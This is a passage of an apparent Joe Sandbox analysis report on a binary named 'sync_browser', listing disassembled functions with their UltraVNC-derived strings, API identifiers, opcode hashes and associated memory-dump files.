                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                                    • API String ID: 171970310-3029765189
                                                                    • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                    • Instruction ID: e5d3087abb46479aae0bb0cbebb619695686f5141813b3883fc08fcd9973f0f2
                                                                    • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                    • Instruction Fuzzy Hash: 38B19221A0869A85EB608B3899406BD37A0FB447B0F504337E67EC7AD5DF29E527C710
                                                                    Function 00007FF6DC0C7A9A Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                                    • API String ID: 171970310-978419383
                                                                    • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                    • Instruction ID: 3411c13b4bd163122319c600e821b01748e27f1dc26100f71f648e845009ec37
                                                                    • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                    • Instruction Fuzzy Hash: A5B1A321A0869A85EB608B3999406BD37A0FB447B0F504337E67EC7AD5DF2DE527C710
                                                                    Function 00007FF6DC0C7ACF Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                                    • API String ID: 171970310-3227166451
                                                                    • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                    • Instruction ID: e1784e62eddb4535d1989f580fe237d0bae2d508b9c5985f76f166560ec6413d
                                                                    • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                    • Instruction Fuzzy Hash: 91B1A221A0869A85EB608B3899406BD37A0FB447B0F444337E67EC7AD5DF2DE527C710
                                                                    Function 00007FF6DC0C7B04 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                                    • API String ID: 171970310-733379141
                                                                    • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                    • Instruction ID: 637a6f385114504dcc45a1be35fd80ef66316743ab2c5041ec52e5b1807af8bb
                                                                    • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                    • Instruction Fuzzy Hash: CEB19221A0869A85EB608B3899406BD37A0FB447B0F504337E67EC7AD5DF2DE527C710
                                                                    Function 00007FF6DC0C4200 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 90threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
                                                                    • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                                    • API String ID: 2763862709-1375279643
                                                                    • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                    • Instruction ID: f617a9efc4c4fd94563de36d2ca923cda2774ef8714830f82eff5d598a4d6908
                                                                    • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                    • Instruction Fuzzy Hash: 39416820A28A9B91FA10DF65BC546FE23A8BF88744F844037D91EC2564DF3DE12B8700
                                                                    Function 00007FF6DC0D26B0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 78librarysleeploaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                                    • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                                    • API String ID: 2931780912-670137772
                                                                    • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                    • Instruction ID: 4b46802ccbe3449a5f33196b90e08e26ea426ed6ba29d4eabd4cb3ea202f456c
                                                                    • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                    • Instruction Fuzzy Hash: 29317E25A18A5A81FA259F21F8542BD63A8FF84B84F450133DD1EC3A54DF3CEA27CB40
                                                                    Function 00007FF6DC0CD560 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                                    • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                                    • API String ID: 421869683-3362258117
                                                                    • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                    • Instruction ID: f7108221b8c14ddfc1c5b4a45671380a04213e0ac20bb51ecb09ff34ac1756ca
                                                                    • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                    • Instruction Fuzzy Hash: 2B516131A08B9585EB148F21E8446AD77A8FB89754F044236EAAD83A94DF3CE527CB40
                                                                    Function 00007FF6DC0D6930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6DC0D695B
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6DC0D69F2
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6DC0D6A39
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6DC0D6BB2
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6DC0D69A4
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6DC0D6A0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                    • Instruction ID: 4431e8fed7dd49b2493eef1f3c9f051761b9422d61814df000c364fe0efc0912
                                                                    • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                    • Instruction Fuzzy Hash: 1E614A62A185EA81FB289B69D8153FD3394EB85344F44453BE98EC7A91DF3DE12BC700
                                                                    Function 00007FF6DC0E2650 Relevance: 18.4, APIs: 9, Strings: 3, Instructions: 431COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: rand$Time_getptd$FileSystem
                                                                    • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                                    • API String ID: 3485648590-3000200491
                                                                    • Opcode ID: 9c4f8f5f3383368a3c5f550ecdcbc58bdc651eaed619b1525faa9b043efa2584
                                                                    • Instruction ID: 2f0e86c9203ae625ef302b9ad626edbae76014c9982333688f50610ee7e0d802
                                                                    • Opcode Fuzzy Hash: 9c4f8f5f3383368a3c5f550ecdcbc58bdc651eaed619b1525faa9b043efa2584
                                                                    • Instruction Fuzzy Hash: 37F13952B193E94AEB11C7BAA8101FC7FA49B82789F544037DF9D9BB86DE2CD112C710
                                                                    Function 00007FF6DC0C3A90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                    • String ID: ($DISPLAY$\background.bmp
                                                                    • API String ID: 3125945695-1422902838
                                                                    • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                    • Instruction ID: 0eae9e6322ae0bf193b6faab6f6677b6cfb1b811b1563e17f8279799dd11ac41
                                                                    • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                    • Instruction Fuzzy Hash: 68418435A1CB9582F7609B24F99436E73A4FB99794F40133ADA9D83B94DF3CD0268B00
                                                                    Function 00007FF6DC0CC810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 366networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recv$send
                                                                    • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                    • API String ID: 1963230611-4083095726
                                                                    • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                    • Instruction ID: 406942f48016ba1a87151df71c4d0f79d571989e527d869be11f10c20d5169e7
                                                                    • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                    • Instruction Fuzzy Hash: 73F1DF22E0CAAA81FF609B21EA4427D6695EBC5794F440133DA4EC3AD5EF2DE527C710
                                                                    Function 00007FF6DC0D70B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
